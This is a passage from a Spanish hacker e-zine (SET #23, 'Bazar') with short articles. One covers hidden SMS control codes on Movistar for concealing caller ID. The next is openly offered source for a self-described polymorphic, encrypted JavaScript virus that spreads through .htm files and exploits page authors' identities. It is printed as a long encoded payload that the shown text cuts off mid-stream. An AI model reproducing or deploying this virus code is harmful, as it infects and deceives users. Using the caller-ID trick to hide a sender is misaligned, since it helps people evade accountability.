Copy Link
Add to Bookmark
Report

SET 023 0x03

  

-[ 0x03 ]--------------------------------------------------------------------
-[ Bazar ]-------------------------------------------------------------------
-[ by Varios Autores ]------------------------------------------------SET-23-



#$""#.
$. ,#
:# ##' .,,. ,.###:. ,, '#,:#$#.
#$ "#; .# #; ,;#' .# #; :#
$. ,# #' '# ,#' #' '# $#
,:###' "#,,$#,. ,#$#;:'` "#,,$#,. ,:'


- [ SET #23 ] -

Barato, barato, reina.
De vuelta con el bazar, lleno de articulos cortos, opiniones
personales, trucos variopintos y toda clase de extra~as maravillas.

El recuerdo de rigor para los que se saltan el articulo 0x07.

- 80 columnas
- Temas novedosos, interesantes, originales o al menos coherentes
- Sin faltas. Vive el verano.


-{ Contenidos del Bazar de SET #23 }-


0x01 - Preprocesado SMS de Movistar < Krip7ik
0x02 - Virus de nuestro tiempo < PL480
0x03 - Kontra el Sistema < _MeNpH_
0x04 - Movidas en GIMP < TryckY
0x05 - Videoklub: Pasion por el cine < ^pRoviDoR
0x06 - El Arte de la Ingenieria Social II < Tahum
0x07 - Er Pako Underground < SET Staff
0x08 - Ascii rules < RagPutana
0x09 - Como ganar a las siete y media < Hendrix
0x0A - BookMarks < SET Staff





-< 0x01 >-------------------------------------------------.-------------.----
`-[ Krip7ik )-ï


________________________________________________
-:=| Comandos de preprocesado en SMS con Vomistar |=:-
------------------------------------------------

By Krip7iK


Bien, hace poco me llego un rumor de ciertos comandos para enviar mensajes
cortos con acuse de recibo, con ocultacion del numero emisor del mensaje
(CID), y ... envio *GRATUITO*...

Pues nada me puse a investigarlo y saque lo siguiente en claro:

Se trata de insertar una serie de comandos antes del SMS en si (antes del
texto); la sintaxis que se usa es la siguiente:

*X*X*X*X*#

Donde las X son los comandos. Esto es: se abre el dialogo de comandos con
un * , luego mediante una letra (en donde esta la X) se especifica el
comando en cuestion, si quieres enviar mas de un comando estos van
separados por * entre si, y finalmente se cierra el dialogo de comandos
con una #.

Los comandos que hemos descubierto y comprobado son los siguientes dos:

o => Ocultacion de identidad (oculta CID)

n => acuse de recibo (te envia un SMS el centro receptor del mensaje, no
el terminal receptor, sino el Centro que usa el terminal receptor,
diciendo que el mensaje que enviaste a la hora tal del dia cual ha sido
recibido por No. a la hora tal del dia cual.)

El comando de envio gratuito que llego a mis oidos es con la letra "u",
pero por la simple prueba que realice (intento de envio con una SIM sin
credito) no debe funcionar, o al menos.. no es la "u" el comando... Lo que
no quiere decir que no exista algun comando que lo permita.

CONCLUSION:

El centro de envio de mensajes tiene en su software algun tipo
de preprocesador del SMS que busca una cierta sintaxis de comandos (la ya
expuesta) y actua en consecuencia.

Ya conocemos dos comandos validos, y nada nos hace pensar que no
existan mas, asi que todos aquellos con tiempo, ganas .. y credito
suficiente podeis intentar descubrir nuevos comandos.

NOTA FINAL: si se abre un dialogo de comandos con * y no se acaba de
cerrar con la consiguiente #, el receptor recibe un mensaje totalmente en
blanco y habreis perdido esas maravillosas 20 pelas... asi que no os
olvideis de la # y no os confundais con los * !!!.

-= Todas las pruebas realizadas han sido hechas con tarjetas Movistar
Activa (diversos tipos: 4, joven...), no se han realizado pruebas por el
momento con Airtel ni con terminales de contrato. Eso si.. se ha probado a
enviar a diferentes compa~ias con exito en todas ellas =-





-< 0x02 >------------------------------------------.-------------------.-----
`-[ PL480 )-ï


Como se ha puesto de moda esto de los virus en javascript, pos no iba
yo a ser menos, y ahi va eso... prefiero que se publique en SET para
que no se me pueda acusar de provocar da~os...

Me parece ironico que en la historia de la love letter sea el pobre
chaval quien pague por las burradas que permiten hacer los programas
de Moco$oft.

Los da~os no los provocan los escritores de virus, sino los sistemas
que permiten la ejecucion de sus codigos.

Confieso que me decidi a terminar el virus tras ver el codigo de love-letter,
con la intencion de hacer algo un poco mas limpio (menos virulento y menos
destructivo) y evolucionado: por lo menos cifra el codigo, y es
primitivamente polimorfico.
No he utilizado la "novedosa" teknika del outlook, porque es de esperar que
dure poco una funcionalidad que permite el spam...
Me parecio mas eficaz una contaminacion lenta mediante archivos htm...

Tiene el interes de utilizar la identidad del escritor de la pagina
para adquirir la confianza de la victima...

PL480.


Nada, que ultimamente me ha dao por empaquetar y
encapsularlo todo... para evitar "accidentes".

Me parecio curioso utilizar los comentarios para
insertar codigo, imagenes, troyanos...

<++>script/pl480.htm

/* Importante: no insertar saltos de linea...*/

function =
pl480(){/*BBHBFBCHCCKBCJBCDHBECBBCBBHBJKBCCCBBCCDCDHBECBBCBIHBCCCBBCCBCJG=
BDEBCGBJFBGFBEGBGFBBGBJFBJFBJFBDEBDEBIHBFCCCBCBBCGBCHCCGCCJGBDEBBJBHIBDGB=
HGBJFBDEBECBBCBBHBDCCFCCCBCDHBECBBCBDEBDEBDEBJHBEIBEJBIHBHIBGHBIIBKHBDJBJ=
GBDEBBIBKIBDJBDEBKHBJHBGJBIHBGHBFJBEIBKIBJIBGHBHIBDEBBJBGJBDJBBJBKIBEJBKH=
BDEBKIBJIBHIBKJBJGBDEBECBBCBKBBECBBCBDEBJHBKIBJIBKEBFJBDEBDJBGJBJIBDEBFJB=
DIBEIBEJBDEBIHBKIBJHBKHBHFBHFBHFBDEBIIBIKBIBCCBCDEBIKBDEBJKBCBCHCCHCCCBCF=
CCDEBCCCBCCCBCEEBEEBEEBDEBJGBCFBECBBCBDEBDEBHCCFBCIKBBCCIBCGCCDEBHCCCCCDE=
BEJBKHBFJBFFBCIBICCBCCGBCBCCGCCIBCGBCFFBGHBBGBIGBFFBCBCGFBCIBCBCBCCHFBHFB=
HFBECBBCBDEBDEBDEBGHBBCCBBCDEBIIBHEBDEBDBCCCCFCCDEBHCCFBCCBCDEBFIBEJBKKBF=
CCGBCDCCHCCDEBFEBIJBEJBFBCDEBJCCGBCFCCICCGCCDEBHCCICCHCCCCCFCCGBCIKBJBCFE=
BECBBCBDEBDEBDEBHCCFBCIKBHCCDEBKKBCCCKBCCBCGCCDEBKCCGBCHCCFBCDEBIJBEJBFBC=
CBCJBCJBCHFBHFBHFBDEBECBBCBKBBJIBCCCKCCDEBIIBHEBIJBGBCBCCBBCCCCKCCGCCDEBG=
BCGCCDEBFBCIKBKKBIBCCBCFCCDEBDBCFCCGBCCBCBCCBBCJBCCDCJGBDEBECBBCBKBBIJBFB=
CCBCFCCCBCDEBCDCCCCICCDEBKCCIKBBCCHCCDEBHCCCCCDEBCBCBCCHCCCBCFCCDEBHCCCCC=
BBCIKBCDCEHBDEBKGBCFBECBBCBKBBDEBDEBECBBCBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBG=
FBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGFBGF=
BGFBGFBGFBGFBGFBGFBECBBCBDEBDEBDEBJHBCBCGCCKKBFCCGBCDCCKKBGBCCCCBCCJGBECB=
BCBECBBCBKHBGCCDEBICCBCCDEBKKBCCCBBCGBCEBCCCCDEBJKBIKBGCCHCCIKBBCCHCCCBCD=
EBFCCCBCBBCICCBCCBBCIKBBCCHCCCBCDEBCDCDEBBBCCBCGCCCCCFCCEBCIKBBCCGBCDDCIK=
BBBCCCCFFBECBBCBDEBCDCIKBDEBECCICCCBCDEBFBCCBCDEBGBCBBCCCCDEBIKBCFDIKBBBC=
GBCCBCBCCBBCCCCJBCCBCDEBDBCICCBCCKKBGBCCCCBCCIKBJBCGBCBBCIKBBBCDEBKBCGBCC=
BCBCCHCCFCCIKBGCCDEBECBBCBGBCBCCJCCCBCGCCHCCGBCEBCIKBJKBIKBDEBJBCIKBDEBIK=
BCDCICCBBCIKBDEBBBCCBCDEBIIBHEBHFBHFBHFBECBBCBIHBCCCBCCDEBJBCCCCDEBKKBICC=
IKBJBCDEBECCICCGBCCBCFCCCCCDEBBBCCBCHBCIKBFCCDEBKKBJBCIKBFCCCCCDEBECCICCC=
BCDEBCBCGCCHCCCBCDEBKKBCCCBBCGBCEBCCCCDEBBCCCCCDEBCBCGCCDEBECBBCBCBCHBCCB=
CKBCDCCJBCIKBFCCFFBDEBECCICCCBCDEBCBCGCCDEBJKBIKBGCCGBCKKBIKBKBCCBCBCCHCC=
CBCDEBICCBCCDEBCBCBCCGCCIKBKBCJKBJBCIKBBBCCCCDEBBBCCBCDEBECBBCBIKBJBCEBCI=
CCBCCCCCGCCDEBDBCFCCIKBEBCKBCCBCBCCHCCCCCGCCDEBBBCCBCDEBJBCCCCGCCDEBDBCGB=
CKKBFBCCBCFCCCCCGCCDEBBBCCBCDEBIKBCDCICCBBCIKBDEBBFBKEBIJBGCCFBCHFBKKBFBC=
KBCKEBDEBCDCECBBCBKEBFIBGCCKKBFCCGBCDCCHCCEGBHFBKKBFBCKBCKEBFFBDEBECCICCC=
BCDEBJCCGBCCBCBCCCBCBCCDEBKKBCCCBCCDEBCBCJBCDEBIJBBGBGIBCFBCDCDEBECCICCCB=
CDEBFBCIKBDEBGCCGBCBBCCCCECBBCBCBCGCCKKBFCCGBCHCCCCCDEBKKBCCCBCCDEBDBCGBC=
BCCCBCGCCDEBCBCBDCKKBICCGCCGBCJCCIKBKBCCBCBCCHCCCBCDEBCBCBBCICCKKBIKBHCCG=
BCJCCCCCGCCJGBDEBBHBHHBGJBFJBFJBKIBJIBDEBECBBCBCCCBCCKKBJBCGBCKKBIBCCHBFE=
BBBCCCCKKBICCKBCCBCBCCHCCHFBIKBJBCJBCHFBHCCCBCBDCHCCCCCGHBHFBJCCIKBJBCICC=
CBCCHBBJBHIBDGBHGBJFBDEBEFBDEBEIBBCCDBCCBCKKBHCCKGBBBCCCCKKBICCKBCCBCBCCH=
CCHFBIKBJBCJBCHFBHCCCBCBDCHCCCCCHFBGCCHCCCDCJBCCBCHFBBBCGBCGCCDCCJBCIKBCD=
CCHBKEBKEBFEBDHBDEBJCCCBCFCCDEBKKBCCCBBCGBCEBCCCCDEBBHBIFBJKBICCHCCHCCCCC=
BCCDHBECBBCBDEBDEBDEBDEBDEBIHBCCCKBCCCCDEBJBCCCCGCCDEBHIBKHBCIBKIBJGBDEBJ=
BCCCCDEBBBCGBCJCCCBCFCCHCCGBCBBCCCCDEBCBCGCCDEBCBCBCCGCCIKBKBCJKBJBCIKBFC=
CHFBECBBCBECBBCBBHBBBCGBCJCCDEBGBCBBCCHBFEBHCCCBCBDCHCCCCCFEBDEBGCCHCCCDC=
JBCCBCCHBFEBBBCGBCGCCDCCJBCIKBCDCJGBKEBBCCCCCBCCCBCKEBFEBDHBECBBCBBHBHCCC=
BCBDCHCCIKBFCCCBCIKBDEBBCCIKBKBCCBCCHBFEBHCCCBCBDCHCCCCCGHBFEBDEBFCCCCCKC=
CGCCCHBFEBBGBJFBFEBDEBKKBCCCJBCGCCCHBFEBHGBJFBFEBDEBDHBBHBIFBHCCCBCBDCHCC=
IKBFCCCBCIKBDHBECBBCBBHBIFBBBCGBCJCCDHBECBBCBDEBEIBBCCDBCCBCKKBHCCIKBDEBJ=
BCCCCGCCDEBDBCGBCKKBFBCCBCFCCCCCGCCDEBHFBFBCHCCKBCDEBBBCCBCJBCDEBCBCGCCKK=
BFCCGBCHCCCCCFCCGBCCCCDEBBFBCDCDEBGCCICCJKBKKBIKBFCCDCCCBCHCCIKBGCCCFBECB=
BCBKKBCCCBCCDEBICCBCCIKBDEBKKBCCCDCCGBCIKBDEBJKBICCFCCBBCIKBKBCCBCBCCHCCC=
BCDEBKKBGBCDBCFCCIKBBBCIKBDEBDCCIKBFCCIKBDEBBBCCCCHCCIKBFCCDEBIKBJBCDEBKK=
BCCCBBCGBCEBCCCCDEBBBCCBCECBBCBICCBCCDEBDCCCBCICCBBCCCCGFBDCCCCCJBCGBCKBC=
CCCFCCDBCGBCGCCKBCCCCHFBECBBCBIHBICCIKBBCCBBCCCCDEBGCCCBCDEBCBCHBCCBCKKBI=
CCHCCIKBDEBCBCJBCDEBKKBCCCBBCGBCEBCCCCDEBFBCHCCKBCJBCFFBDEBKBCCCCBBCGBCDB=
CGBCKKBIKBDEBCBCJBCDEBFCCCBCEBCGBCGCCHCCFCCCCCECBBCBDCCIKBFCCIKBDEBGCCCBC=
FCCDEBGBCBCCGBCKKBGBCIKBBBCCCCDEBIKBJBCDEBIKBFCCFCCIKBBCCECCICCCBCDEBBBCC=
BCJBCDEBKCCBGBHFBECBBCBGHBBBCCBCKBCIKBGCCDEBJHBCBCHBCIKBDEBICCBCCIKBDEBFC=
CICCHCCGBCBCCIKBDEBFCCCBCGCCGBCBBCCBCBCCHCCCBCDEBFEBICCGCCICCIKBFCCGBCCCC=
HFBHBCGCCFEBDEBECCICCCBCECBBCBECCICCCBCDEBJBCIKBBCCDDCIKBDEBCBCGCCDCCCCCF=
CCIKBBBCGBCKKBIKBKBCCBCBCCHCCCBCDEBJBCIKBDEBFCCICCHCCGBCBCCIKBDEBBBCCBCDE=
BGBCBCCDBCCBCKKBKKBGBCCCCBCCECBBCBCBCBCCDEBICCBCCDEBIKBFCCKKBFBCGBCJCCCCC=
DEBHCCCBCKBCDCCCCCFCCIKBJBCHFBHFBHFBECBBCBECBBCBBJBIKBFCCIKBDEBCBCJCCGBCH=
CCIKBFCCDEBFCCCBCGBCBCCDBCCBCKKBHCCIKBFCCDEBBGBDEBJCCCBCKKBCBCGCCDEBCBCJB=
CDEBKBCGBCGCCKBCCCCDEBDBCGBCKKBFBCCBCFCCCCCFFBECBBCBDBCGBCFCCKBCIKBDEBKKB=
CCCBCCDEBCBCJBCDEBBCCCCCKBCJKBFCCCBCDEBBBCCBCDEBICCGCCICCIKBFCCGBCCCCDEBB=
BCCBCJBCDEBCCCFCCBBCCBCBCCIKBBBCCCCFCCHFBHFBHFBECBBCBDCCCCCFCCDEBJBCCCCDE=
BHCCIKBBCCHCCCCCFFBDEBCBCJBCDEBECCICCCBCDEBCBCHBCCBCKKBICCHCCCBCDEBCBCJBC=
DEBJCCGBCFCCICCGCCFFBDEBBBCCBCHBCIKBFCCIKBDEBECBBCBGBCBCCCBCJCCGBCHCCIKBJ=
KBJBCCBCKBCCBCBCCHCCCBCDEBGCCICCDEBFBCICCCBCJBCJBCIKBDEBCBCBCCDEBCBCJBCDE=
BKKBCCCBBCGBCEBCCCCHFBHFBHFBECBBCBGHBBBCCBCKBCIKBGCCDEBDCCCCCGCCGBCJKBGBC=
JBCGBCHCCIKBDEBJBCIKBDEBGBCBCCDBCCBCKKBKKBGBCCCCBCCDEBDCCCCCFCCDEBJCCIKBF=
CCGBCIKBGCCDEBJCCIKBFCCGBCIKBBCCHCCCBCGCCECBBCBGCCGBCKBCICCJBCHCCIKBBCCCB=
CIKBKBCCBCBCCHCCCBCHFBHFBHFBDEBECBBCBECBBCBDIBCBCDEBGBCBCCHCCCBCBCCHCCIKB=
BBCCCCDEBFBCIKBKKBCBCFCCDEBICCBCCDEBKKBCCCBBCGBCEBCCCCDEBJBCCCCDEBKBCCBCB=
CCCCCGCCDEBBBCIKBCFDGBCBCCCCCDEBDCCCCCGCCGBCJKBJBCCBCFFBDEBCDCIKBECBBCBEC=
CICCCBCDEBBCCCCCDEBDCCFCCCCCJCCCCCKKBIKBDEBBBCIKBCFDCCCGCCDEBGBCFCCFCCCBC=
DCCIKBFCCIKBJKBJBCCBCGCCJGBECBBCBDEBJKBIKBGCCHCCIKBDEBKKBCCCBCCDEBJKBCCCF=
CCFCCIKBFCCDEBJBCIKBDEBKKBJBCIKBJCCCBCDEBCBCBCCDEBDJBICCBCCKIBBCCKKBCBCKH=
BBDCDEBCDCDEBCBCJBCECBBCBDEBDBCGBCKKBFBCCBCFCCCCCDEBKKBCCCFCCFCCCBCGCCDCC=
CCCBCCBBCGBCCBCBCCHCCCBCJGBDEBFEBBCCCCCKBCJKBFCCCBCDEBBBCCBCDEBICCGCCICCI=
KBFCCGBCCCCHFBHBCGCCFEBFFBECBBCBDEBIKBBBCCBCKBCIKBGCCDEBBBCCBCDEBJBCGBCKB=
CDCCGBCIKBFCCDEBHCCCCCBBCCCCGCCDEBJBCCCCGCCDEBIKBFCCKKBFBCGBCJCCCCCGCCDEB=
FBCHCCKBCDEBBBCCBCJBCECBBCBDEBCBCGCCKKBFCCGBCHCCCCCFCCGBCCCCHFBHFBHFBECBB=
CBECBBCBDEBDEBGCCGBCDEBBBCCBCDEBHCCCCCBBCIKBGCCDEBDBCCCCFCCKBCIKBGCCDEBKK=
BFCCCBCCBCGCCDEBCBCBCCDEBJBCIKBDEBBCCCBCKKBCBCGCCGBCBBCIKBBBCECBBCBDEBDEB=
BBCCBCDEBDBCCCCKBCCBCBCCHCCIKBFCCDEBJBCIKBDEBJKBGBCCCCBBCGBCJCCCBCFCCGCCG=
BCBBCIKBBBCHFBHFBHFBDEBBHBJKBICCHCCHCCCCCBCCDEBCCCBCCKKBJBCGBCKKBIBCCHBFE=
BBJBHIBDGBHGBJFBBFBCFBFEBDHBGFBGFBGFBDEBBJBHIBDGBHGBJFBDEBGFBGFBGFBBHBIFB=
JKBICCHCCHCCCCCBCCDHBECBBCBECBBCBBHBIFBDCCFCCCBCDHBECBBCBECBBCBBHBIFBJKBC=
CCBBCCDCDHBECBBCBBHBIFBFBCHCCKBCJBCDHBECBBCBECBBCBECBBCBECBBCBECBBCBECBBC=
BECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCB=
ECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBECBBCBBHBEJBI=
HBDJBEIBBJBFJBDHBECBBCBDBCICCBCCKKBHCCGBCCCCBCCDEBBJBHIBDGBHGBJFBBFBCFBED=
CECBBCBECBBCBIFBDFBDEBIHBCCCBBCCBCJGBDEBCGBJFBGFBEGBGFBBGBJFBJFBJFBDEBDEB=
IHBFCCCBCBBCGBCHCCGCCJGBDEBBJBHIBDGBHGBJFBDEBECBBCBDEBJHBKIBJIBKEBFJBDEBD=
JBGJBJIBDEBFJBDIBEIBEJBDEBIHBKIBJHBKHBHFBHFBHFBDEBIIBIKBIBCCBCDEBIKBDEBJK=
BCBCHCCHCCCBCFCCDEBCCCBCCCBCEEBEEBEEBDEBJGBCFBECBBCBDFBIFBECBBCBJCCIKBFCC=
DEBFJBCBCKBCDCCCCCFCCIKBFCCCDCBIBCCCJBCBBCCBCFCCCHBBGBKGBECBBCBJCCIKBFCCD=
EBCCCJKBHBCJIBCBCHCCDEBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCB=
CKKBHCCBFBFEBIJBEJBKKBFCCGBCDCCHCCHFBJIBCBCHCCKCCCCCFCCIBCFEBCFBECBBCBJCC=
IKBFCCDEBKKBFCCCDCDEBCHBDEBBCCCBCKCCDEBEJBHCCFCCGBCBCCEBCBFBDEBEIBBCCDBCC=
BCKKBHCCDEBEFBDEBBJBHIBDGBHGBJFBDEBEFBDEBFEBBJBHIBDGBHGBJFBBFBCFBKGBFEBCF=
BKGBECBBCBJCCIKBFCCDEBFCCBCCBBCDEBCHBDEBIIBIKBHCCFBCHFBFCCCCCICCBCCBBCBFB=
IIBIKBHCCFBCHFBFCCIKBBCCBBCCCCKBCBFBCFBDEBDFBDEBKFBJFBJFBJFBCFBKGBECBBCBJ=
CCIKBFCCDEBIBCDEBCHBIIBIKBHCCFBCHFBFCCCCCICCBCCBBCBFBIIBIKBHCCFBCHFBFCCIK=
BBCCBBCCCCKBCBFBCFBDEBDFBDEBBGBJFBCFBDEBEFBDEBFGBEGBKGBECBBCBJCCIKBFCCDEB=
BCCDEBCHBDEBEJBHCCFCCGBCBCCEBCHFBDBCFCCCCCKBCIHBFBCIKBFCCIHBCCCBBCCBCBFBI=
BCFFBIBCDEBEFBDEBKFBFFBIBCDEBEFBDEBBGBFFBIBCEFBCGBFFBIBCEFBDGBCFBKGBECBBC=
BECBBCBDEBJCCIKBFCCDEBDCCCCCJBCCDCDEBCHBBCCCBCKCCDEBEJBHCCFCCGBCBCCEBCBFB=
FEBDBCICCBCCKKBHCCGBCCCCBCCDEBBJBFEBDEBEFBDEBFCCBCCBBCDEBEFBDEBFEBBFBCFBE=
DCJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBJFBCFBDEBEFBFEBCHBFEBDE=
BEFBDEBIBCDEBEFBFEBKGBFEBCFBKGBECBBCBDEBDCCCCCJBCCDCDEBEFBCHBDEBFEBJCCIKB=
FCCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBDEBCHBDEBBCCCBCK=
CCDEBGHBFCCFCCIKBCDCBFBFEBKGBECBBCBDEBDBCCCCFCCDEBBFBJCCIKBFCCDEBGBCCHBJF=
BKGBGBCBHBKKBFCCCDCHFBJBCCBCBCCEBCHCCFBCDEBGFBDEBKFBKGBGBCEFBEFBCFBEDCDEB=
DCCCCCJBCCDCDEBEFBCHBDEBBFBKKBFCCCDCHFBKKBFBCIKBFCCIHBCCCBBCCBCGHBHCCBFBG=
BCCFBDEBEFBDEBIBCCFBDEBEFBDEBFEBFFBFEBKGBGDCDEBDEBECBBCBDEBDCCCCCJBCCDCDE=
BEFBCHBBFBKKBFCCCDCHFBKKBFBCIKBFCCIHBCCCBBCCBCGHBHCCBFBGBCCFBDEBEFBDEBIBC=
CFBEFBFEBCFBKGBFEBKGBECBBCBECBBCBKKBFCCCDCDEBCHBDEBFEBDBCGCCCCCDEBCHBDEBB=
CCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBKEBEJBKKBFCCGBCDCCHC=
CGBCBCCEBCHFBBIBGBCJBCCBCEJBCDCGCCHCCCBCKBCKIBJKBHBCCBCKKBHCCKEBCFBKGBFEB=
ECBBCBKKBFCCCDCDEBEFBCHBDEBFEBGBCDBCDEBBFBDBCGCCCCCEEBCHBBCCICCJBCJBCCFBE=
DCFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBJCCIKBFCCDEBGCCCDCGCCDEBCHBDEBDBCGC=
CCCCHFBCIBCBCHCCBIBCCCJBCBBCCBCFCCBFBDBCGCCCCCHFBCIBCBCHCCEJBDCCCBCKKBGBC=
IKBJBCBIBCCCJBCBBCCBCFCCBFBJFBCFBCFBKGBFEBKGBECBBCBECBBCBKKBFCCCDCDEBEFBC=
HBDEBFEBGBCDBCDEBBFBEEBDBCGCCCCCHFBBIBGBCJBCCBCKHBBDCGBCGCCHCCGCCBFBKEBFE=
BEFBDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBFEBHFBHBCGCCKEB=
CFBCFBEDCFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBKEBJCCIKBFCCDEBDBCCHBDBCGCCCCCH=
FBKIBDCCCBCBCCFJBCBCBDCHCCBIBGBCJBCCBCBFBGCCCDCGCCDEBEFBDEBFEBIFBIFBKEBEF=
BDEBCCCJKBHBCJIBCBCHCCHFBGJBGCCCBCFCCJIBIKBKBCCBCDEBEFBKEBHFBHBCGCCFEBDEB=
FFBBGBFFBHCCFCCICCCBCCFBKGBKEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBF=
CCGBCHCCCBCBFBKEBDBCICCBCCKKBHCCGBCCCCBCCDEBBJBFEBDEBEFBDEBFCCBCCBBCDEBEF=
BDEBFEBBFBCFBEDCJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBJFBCFBDEB=
EFBFEBCHBFEBDEBEFBDEBIBCDEBEFBFEBKGBJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCIKBF=
CCGHBHCCBFBKFBCFBDEBEFBFEBDEBCHBDEBBCCCBCKCCDEBGHBFCCFCCIKBCDCBFBKEBCFBKG=
BFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCCCCFCCDEBBFBJCCIKBFCCDEBFEBEFBDEB=
BCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBCHBJFBKGBFEBEFBDEBBCCHFBKKBFBCI=
KBFCCGHBHCCBFBCGBCFBDEBEFBFEBBHBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCF=
BDEBEFBFEBHFBJBCCBCBCCEBCHCCFBCDEBGFBKFBKGBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHB=
HCCBFBCGBCFBDEBEFBFEBEFBEFBCFBEDCDEBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBD=
BCHFBIJBFCCGBCHCCCBCBFBFEBEFBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBCK=
BFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBEKBEFBKEBFFBDEBKEBCFB=
GDCKGBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBFEBEFBB=
CCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBCKBFEBEFBDEBBCCHFBKKBFBCIKBFCCGH=
BHCCBFBCGBCFBDEBEFBFEBEKBEFBDEBKEBCFBKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEB=
EFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBFEBEFBDEBBCCHFBKKBFBCI=
KBFCCGHBHCCBFBBGBCFBDEBEFBFEBCHBDKBFEBDKBFEBKGBDBCCCCFCCDEBBFBJCCIKBFCCDE=
BFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBCHBJFBKGBFEBEFBDEBBCC=
HFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBBHBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBH=
CCBFBKFBCFBDEBEFBFEBHFBJBCCBCBCCEBCHCCFBCKGBFEBEFBDEBBCCHFBKKBFBCIKBFCCGH=
BHCCBFBCGBCFBDEBEFBFEBEFBEFBCFBEDCDEBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFB=
BGBCFBDEBEFBFEBDEBEFBCHBDEBEJBHCCFCCGBCBCCEBCHFBDBCFCCCCCKBCIHBFBCIKBFCCI=
HBCCCBBCCBCBFBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBKFBCFBDEBEFBFEBCKBFEBEF=
BDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBCGBCFBDEBEFBFEBEKBGFBFEBEFBDEBBCCHFBKKBFBC=
IKBFCCGHBHCCBFBJFBCFBDEBEFBFEBCFBGDCKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBE=
FBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBDBCGCCCCCDEBCHBDEBBCCCB=
CKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBDKBFEBEJBKKBFCCGBCDCCHCC=
GBCBCCEBCHFBBIBGBCJBCCBCEJBCDCGCCHCCCBCKBCKIBJKBHBCCBCKKBHCCDKBFEBCFBKGBJ=
CCIKBFCCDEBHCCDBCCCCJBCBBCCBCFCCDEBCHBDEBDBCGCCCCCHFBCIBCBCHCCEJBDCCCBCKK=
BGBCIKBJBCBIBCCCJBCBBCCBCFCCBFBBGBCFBKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEB=
EFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBHCCBCCIKBKBCCBCDEBCHBD=
EBDBCGCCCCCHFBCIBCBCHCCFJBCBCKBCDCCJIBIKBKBCCBCBFBCFBKGBKEBCFBKGBFEBKGBEC=
BBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBJCCIKBFCCDEBHCCDBC=
GBCJBCCBCDEBCHBDEBHCCDBCCCCJBCBBCCBCFCCHFBIHBFCCCBCIKBHCCCBCFJBCBCBDCHCCB=
IBGBCJBCCBCBFBHCCBCCIKBKBCCBCDEBEFBDKBFEBHFBHBCGCCDKBFEBCFBKGBKEBCFBKGBFE=
BKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBHCCDBCGBCJBC=
CBCHFBIJBFCCGBCHCCCBCBFBFEBEFBDEBBCCHFBKKBFBCIKBFCCGHBHCCBFBBGBCFBDEBEFBF=
EBCFBKGBKEBCFBKGBFEBKGBECBBCBKKBFCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCB=
CBFBKEBHCCDBCGBCJBCCBCHFBIHBJBCCCCGCCCBCBFBCFBKGBKEBCFBKGBFEBKGBECBBCBKKB=
FCCCDCDEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBDKBFEBJCCIKBFCCDEBIJBGCCFBCD=
EBCHBDEBBCCCBCKCCDEBGHBKKBHCCGBCJCCCBCJJBKIBJKBHBCCBCKKBHCCBFBKEBIJBEJBKK=
BFCCGBCDCCHCCHFBEJBFBCCBCJBCJBCKEBCFBKGBDKBFEBCFBKGBFEBKGBECBBCBKKBFCCCDC=
DEBEFBCHBDEBFEBDBCHFBIJBFCCGBCHCCCBCBFBKEBIJBGCCFBCHFBDJBICCBCCBFBHCCDBCC=
CCJBCBBCCBCFCCDEBEFBDEBDKBFEBIFBIFBDKBFEBDEBEFBHCCBCCIKBKBCCBCEFBDKBFEBHF=
BHBCGCCDKBFEBFFBHGBFFBHCCFCCICCCBCCFBKGBDBCGCCCCCHFBJHBCBCJBCCBCHCCCBCBIB=
